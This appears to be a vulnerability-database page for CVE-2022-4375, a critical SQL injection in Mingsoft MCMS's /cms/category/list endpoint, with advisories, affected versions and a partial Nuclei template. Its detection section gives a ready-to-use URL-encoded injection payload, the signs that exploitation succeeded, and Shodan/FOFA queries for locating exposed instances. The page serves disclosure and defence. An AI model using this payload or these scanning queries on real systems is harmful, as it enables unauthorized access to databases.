CVE-2022-4375
published 2022-12-09CVE-2022-4375: A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The…
PriorityP264critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.89%
85.1th percentile
A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The manipulation of the argument sqlWhere leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215196.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mingsoft | mcms | < 5.2.10 | 5.2.10 |
| mingsoft | mcms | — | — |
| mingsoft | mcms | — | — |
| mingsoft | mcms | — | — |
| mingsoft | mcms | — | — |
| mingsoft | mcms | — | — |
| mingsoft | mcms | — | — |
| mingsoft | mcms | — | — |
| mingsoft | mcms | — | — |
| mingsoft | mcms | — | — |
| mingsoft | mcms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandsqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d
otherhttp.favicon.hash:1464851260
othericon_hash="1464851260"
- →Exploit sends a POST request to /cms/category/list with a URL-encoded JSON payload in the sqlWhere parameter containing extractvalue(0x7e,concat(0x7e,(database()))) to trigger SQL injection. ↗
- →Successful exploitation is indicated by a 500 or 200 HTTP response containing 'java.sql.SQLSyntaxErrorException' or 'java.sql.SQLException' in the response body.
- →Response body may also contain 'Icategorydao.xml' or 'cms_category' as additional confirmation of SQL injection triggering the MCMS category DAO layer.
- →Fingerprint the target as Mingsoft MCMS by checking the HTTP response body for the string 'mingsoft.net' before attempting exploitation.
- →Use Shodan query http.favicon.hash:1464851260 or FOFA query icon_hash="1464851260" to identify internet-exposed Mingsoft MCMS instances.
- ·The vulnerability affects Mingsoft MCMS versions up to and including 5.2.9; version 5.2.10 is patched. ↗
- ·The endpoint /cms/category/list accepts the sqlWhere parameter via POST with Content-Type application/x-www-form-urlencoded; the injection is in the sqlWhere field which is passed unsanitized to the SQL layer. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Mingsoft MCMS vulnerable to SQL Injection
ghsa·2022-12-09
CVE-2022-4375 [CRITICAL] CWE-89 Mingsoft MCMS vulnerable to SQL Injection
Mingsoft MCMS vulnerable to SQL Injection
A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The manipulation of the argument sqlWhere leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215196.
OSV
Mingsoft MCMS vulnerable to SQL Injection
osv·2022-12-09
CVE-2022-4375 [CRITICAL] Mingsoft MCMS vulnerable to SQL Injection
Mingsoft MCMS vulnerable to SQL Injection
A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The manipulation of the argument sqlWhere leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215196.
No detection rules found.
Nuclei
Mingsoft MCMS - SQL Injection
nuclei·CVSS 9.8
CVE-2022-4375 [CRITICAL] Mingsoft MCMS - SQL Injection
Mingsoft MCMS - SQL Injection
SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
Template:
id: CVE-2022-4375
info:
name: Mingsoft MCMS - SQL Injection
author: ritikchaddha
severity: critical
description: |
SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation: |
Apply the vendor-supplied patch or update to the latest version.
reference:
- https://gitee.com/mingSoft/MCMS/issues/I61TG5
- https://nvd.nist.gov/vuln/detail/CVE-2022-4375
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4375
cwe-id: CWE-89,CWE-707
epss-score: 0.26
No writeups or analysis indexed.
2022-12-09
Published